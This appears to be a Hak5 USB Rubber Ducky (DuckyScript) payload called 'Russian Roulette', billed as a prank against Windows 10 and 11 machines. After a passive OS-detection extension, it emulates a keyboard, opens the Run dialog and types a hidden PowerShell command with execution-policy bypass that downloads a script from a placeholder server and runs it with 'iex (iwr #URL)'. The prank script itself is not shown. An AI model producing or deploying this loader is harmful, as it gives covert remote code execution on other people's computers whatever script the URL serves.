1
REM Title: Russian Roulette
2
REM Author: Phishing Tides
3
REM Target: Windows 10, 11
4
REM Description: User is forced to play a game of russian roulette
5
REM Version: 1.1
6
REM Category: Prank
7
REM Source: https://github.com/Phishing-Tides/Hak5_RubberDucky_Payloads
8

9
REM Please replace the link with your .ps1 raw file below
10
DEFINE #URL https://serveryouown.com/rawfile/russianroulette.ps1
11

12
ATTACKMODE HID
13

14
EXTENSION PASSIVE_WINDOWS_DETECT
15
    REM VERSION 1.1
16
    REM AUTHOR: Korben
17

18
    REM_BLOCK DOCUMENTATION
19
        Windows fully passive OS Detection and passive Detect Ready
20
        Includes its own passive detect ready.
21
        Does not require additional extensions.
22

23
        USAGE:
24
            Extension runs inline (here)
25
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
26
            boot delay
27
            $_OS will be set to WINDOWS or NOT_WINDOWS
28
            See end of payload for usage within payload
29
    END_REM
30

31
    REM CONFIGURATION:
32
    DEFINE #MAX_WAIT 150
33
    DEFINE #CHECK_INTERVAL 20
34
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
35
    DEFINE #NOT_WINDOWS 7
36

37
    $_OS = #NOT_WINDOWS
38

39
    VAR $MAX_TRIES = #MAX_WAIT
40
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
41
        DELAY #CHECK_INTERVAL
42
        $MAX_TRIES = ($MAX_TRIES - 1)
43
    END_WHILE
44
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
45
        $_OS = WINDOWS
46
    END_IF
47

48
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
49
        IF ($_OS == WINDOWS) THEN
50
            STRING HELLO WINDOWS!
51
        ELSE
52
            STRING HELLO WORLD!
53
        END_IF
54
    END_REM
55
END_EXTENSION
56

57
GUI m
58
DELAY 500
59
GUI r
60
DELAY 500
61
DELETE
62
DELAY 100
63
STRINGLN powershell -w h -NoP -NonI -Exec Bypass -Command "Start-Process powershell -ArgumentList '-NoP -NonI -Exec Bypass -w h -Command iex (iwr #URL)' -WindowStyle Hidden"
64

65